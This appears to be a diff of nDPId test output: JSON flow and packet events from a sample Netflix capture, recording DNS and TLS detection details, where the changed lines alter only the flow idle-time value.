00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1484319034890,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1484319034890,"pkt":"AQBef\/\/65JjWH70UCABGAAAgKLUAAAECSnnAqAEH7\/\/\/+pQEAAAWAPoE7\/\/\/+gAAAAAAAAAAAAAAAAAA"} 00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} @@ -74,76 +74,76 @@ 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1484319035024,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1484319035024,"pkt":"5JjWH70UgCqoTGHMCABFAADT4UNAAEAR1X3AqAEBwKgBBwA1yu0AvyycGiGBgAABAAgAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAcAMAAEAAQAAADoABDRZJ4vADAABAAEAAAA6AAQ0KHEVwAwAAQABAAAAOgAENrvKVcAMAAEAAQAAADoABDQnzgXADAABAAEAAAA6AAQ2lKPwwAwAAQABAAAAOgAENrujrcAMAAEAAQAAADoABDQoEorADAABAAEAAAA6AAQ0KGy7"} 00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319035024,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.89.39.139"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035079,"flow_last_seen":1484319035079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035079,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1484319035079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035079,"pkt":"gCqoTGHM5JjWH70UCABFAABAYJ9AAEAGvIXAqAEHNFkni8+MAbsc0sO0AAAAALAC\/\/+HyQAAAgQFtAEDAwUBAQgKH2TAbQAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035080,"flow_last_seen":1484319035080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035080,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1484319035080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035080,"pkt":"gCqoTGHM5JjWH70UCABFAABASDpAAEAG1OrAqAEHNFkni8+NAbuZGBE+AAAAALAC\/\/+99wAAAgQFtAEDAwUBAQgKH2TAbgAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1484319035129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035129,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z4zl6UHQHNLDtaASReq0kAAAAgQFtAQCCAqtiMj8H2TAbQEDAwg="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1484319035130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035130,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gZlAAEAGm5fAqAEHNFkni8+MAbsc0sO15elB0YAQEBUZAAAAAQEICh9kwKCtiMj8"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1484319035130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035130,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGNAk0WSeLwKgBBwG7z40HBfk7mRgRP6ASReoSOAAAAgQFtAQCCAqtiMj8H2TAbgEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1484319035132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035132,"pkt":"gCqoTGHM5JjWH70UCABFAAA0YNFAAEAGvF\/AqAEHNFkni8+NAbuZGBE\/BwX5PIAQEBV2pwAAAQEICh9kwKGtiMj8"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035079,"flow_last_seen":1484319035134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035134,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035080,"flow_last_seen":1484319035136,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035136,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035079,"flow_last_seen":1484319035185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035185,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035079,"flow_last_seen":1484319035186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035186,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035080,"flow_last_seen":1484319035200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035200,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035080,"flow_last_seen":1484319035215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035215,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035342,"flow_last_seen":1484319035342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035342,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1484319035342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035342,"pkt":"gCqoTGHM5JjWH70UCABFAABA3CdAAEAGQP3AqAEHNFkni8+OAbvRf5R9AAAAALAC\/\/8BVgAAAgQFtAEDAwUBAQgKH2TBaAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1484319035397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035397,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z47YAyXj0X+UfqASRepXrQAAAgQFtAQCCAqtiMk\/H2TBaAEDAwg="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1484319035399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035399,"pkt":"gCqoTGHM5JjWH70UCABFAAA0+2BAAEAGIdDAqAEHNFkni8+OAbvRf5R+2AMl5IAQEBW8GgAAAQEICh9kwZ2tiMk\/"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035342,"flow_last_seen":1484319035401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035342,"flow_last_seen":1484319035449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319035449,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035079,"flow_last_seen":1484319035079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035079,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1484319035079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035079,"pkt":"gCqoTGHM5JjWH70UCABFAABAYJ9AAEAGvIXAqAEHNFkni8+MAbsc0sO0AAAAALAC\/\/+HyQAAAgQFtAEDAwUBAQgKH2TAbQAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035080,"flow_last_seen":1484319035080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035080,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1484319035080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035080,"pkt":"gCqoTGHM5JjWH70UCABFAABASDpAAEAG1OrAqAEHNFkni8+NAbuZGBE+AAAAALAC\/\/+99wAAAgQFtAEDAwUBAQgKH2TAbgAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1484319035129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035129,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z4zl6UHQHNLDtaASReq0kAAAAgQFtAQCCAqtiMj8H2TAbQEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1484319035130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035130,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gZlAAEAGm5fAqAEHNFkni8+MAbsc0sO15elB0YAQEBUZAAAAAQEICh9kwKCtiMj8"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1484319035130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035130,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGNAk0WSeLwKgBBwG7z40HBfk7mRgRP6ASReoSOAAAAgQFtAQCCAqtiMj8H2TAbgEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1484319035132,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035132,"pkt":"gCqoTGHM5JjWH70UCABFAAA0YNFAAEAGvF\/AqAEHNFkni8+NAbuZGBE\/BwX5PIAQEBV2pwAAAQEICh9kwKGtiMj8"} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035079,"flow_last_seen":1484319035134,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035134,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035080,"flow_last_seen":1484319035136,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035136,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035079,"flow_last_seen":1484319035185,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035185,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035079,"flow_last_seen":1484319035186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035186,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 